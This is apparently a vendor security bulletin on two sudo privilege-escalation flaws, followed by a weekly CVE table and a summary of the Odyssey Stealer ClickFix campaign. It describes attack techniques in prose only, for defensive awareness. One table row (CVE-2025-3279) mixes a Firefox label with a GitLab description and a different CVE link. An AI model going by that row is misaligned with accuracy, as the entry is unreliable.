Critical Sudo Flaws Allow Local Privilege Escalation on Linux
Critical Sudo Flaws Allow Local Privilege Escalation on Linux
Critical Sudo Flaws Allow Local Privilege Escalation on Linux
Information:
Sudo is a command-line tool that allows low-privileged users to run commands as another user, such as the superuser. By executing instructions with sudo, the idea is to enforce the principle of least privilege, permitting users to carry out administrative actions without the need for elevated permissions.
The command is configured through a file called "/etc/sudoers," which determines "who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands."
Incident:
Researchers have found two security flaws in the Sudo utility that allow local attackers to gain root access on vulnerable Linux and Unix-like systems.
Security researcher Rich Mirch uncovered two critical privilege escalation flaws in Sudo, a widely used Linux utility.
- CVE-2025-32462 (CVSS score: 2.8): A 12-year-old bug in the -h (host) option allows users to run commands permitted on a remote host locally. This mainly affects systems using a shared sudoers file or LDAP-based sudoers (e.g., SSSD).
- CVE-2025-32463 (CVSS score: 9.3): Exploits the -R (chroot) option to execute arbitrary commands as root, even if not listed in the sudoers file. It can be abused by local users without any special sudo permissions.
Both vulnerabilities affect the default Sudo configuration. The Sudo team plans to remove the chroot option in future versions due to its complexity and risks.
Recommendation:
The vulnerabilities have been addressed in Sudo version 1.9.17p1 released late last month. Advisories have also been issued by various Linux distributions, since Sudo comes installed on many of them.
Users are advised to apply the necessary fixes and ensure that the Linux desktop distributions are updated with the latest packages.
The important things is Security systems. We must concern and monitor as usual.
For more information please contact
Email :sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
0613879439 (Ms.Sirilak)
0922576902 (Ms.Narusorn)
References :
- https://thehackernews.com/2025/07/critical-sudo-vulnerabilities-let-local.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-32462
- https://nvd.nist.gov/vuln/detail/CVE-2025-32463
- https://www.sudo.ws/security/advisories/
- https://www.sudo.ws/releases/stable/#1.9.17p1
Weekly Interesting CVE | EN
| NO. |
CVE Name |
Published Date |
Last Update |
Device/Appplication/OS Target |
Attack Type |
CVSS |
Detail |
Solution |
Reference |
|---|---|---|---|---|---|---|---|---|---|
| 1 |
CVE-2025-24471 |
10/6/2025 |
12/6/2025 |
FortiOS version 7.6.1 and below, version 7.4.7 and below |
Certificate validation |
6.5 |
An Improper Certificate Validation vulnerability in FortiOS version 7.6.1 and below, version 7.4.7 and below may allow an EAP verified remote user to connect from FortiClient via revoked certificate. |
Upgrade to version 7.6.2 or above |
|
| 2 |
CVE-2025-47867 |
17/6/2025 |
17/6/2025 |
Trend Micro Apex Central versions below 8.0.6955 |
File inclusion |
7.5 |
A Local File Inclusion vulnerability in a Trend Micro Apex Central widget in versions below 8.0.6955 could allow an attacker to include arbitrary files to execute as PHP code and lead to remote code execution on affected installations. |
Update to the latest version. |
|
| 3 |
CVE-2025-49218 |
17/6/2025 |
18/6/2025 |
Trend Micro Endpoint Encryption PolicyServer Versions before 6.0.0.4013 |
Post-authentication SQL Injection |
7.7 |
A post-auth SQL injection vulnerability in the Trend Micro Endpoint Encryption PolicyServer Versions before 6.0.0.4013 could allow an attacker to escalate privileges on affected installations |
Upgrade to version 6.0.0.4013 |
https://success.trendmicro.com/en-US/solution/KA-0019928
|
| 4 |
CVE-2025-33117 |
19/6/2025 |
19/6/2025 |
IBM QRadar SIEM 7.5 - 7.5.0 UP12 IF01 |
External Control of File Name or Path |
9.1 |
IBM QRadar SIEM 7.5 through 7.5.0 Update Package 12 could allow a privileged user to modify configuration files that would allow the upload of a malicious autoupdate file to execute arbitrary commands. |
Upgrade to version 7.5.0 UP12 IF02 |
|
| 5 |
CVE-2025-3279 |
26/6/2025 |
26/6/2025 |
Mozilla Firefox Versions before 122 |
Use-After-Free |
6.5 |
An issue has been discovered in GitLab CE/EE affecting all versions from 10.7 before 17.11.5, 18.0 before 18.0.3, and 18.1 before 18.1.1 that could have allowed authenticated attackers to create a DoS condition by sending crafted GraphQL requests. |
Upgrade to version 122 or Update to the latest version. |
https://nvd.nist.gov/vuln/detail/CVE-2024-0752
|
Malware News or Campaign IOC/IOA | EN
|
No |
Campaign Name |
Detection Date |
Attack Type |
Description |
Mitigation/Remediation |
|---|---|---|---|---|---|
| 1 |
MacOS malware Poseidon Stealer rebranded as Odyssey Stealer |
26/06/2025 |
information-stealer |
New malware discovered called Odyssey Stealer, rebranded from Poseidon Stealer, a malware as a service (MaaS) that was previously distributed on Google Ads in 2024. According to CYFIRMA, the malware was used in a campaign called ClickFix that spread across financial websites, cryptocurrency news sites, and the Apple App Store. ClickFix works by pretending to be a Cloudflare CAPTCHA and instructing victims to execute a base-64 encoded command in a terminal window to prove they are not a robot. The command runs an Odyssey AppleScript to trick users into entering their device password, which is used to decrypt Keychain credentials. It steals app, wallet, and browser passwords, desktop files, payment data, browsing history, and session cookies. The malware zips the data at /tmp/lovemrtrump and exfiltrates it. CYFIRMA has published IoCs for this campaign to enhance organizational prevention and detection capabilities. |
|
Ref: https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/
15 July 2025
Viewed 209 time
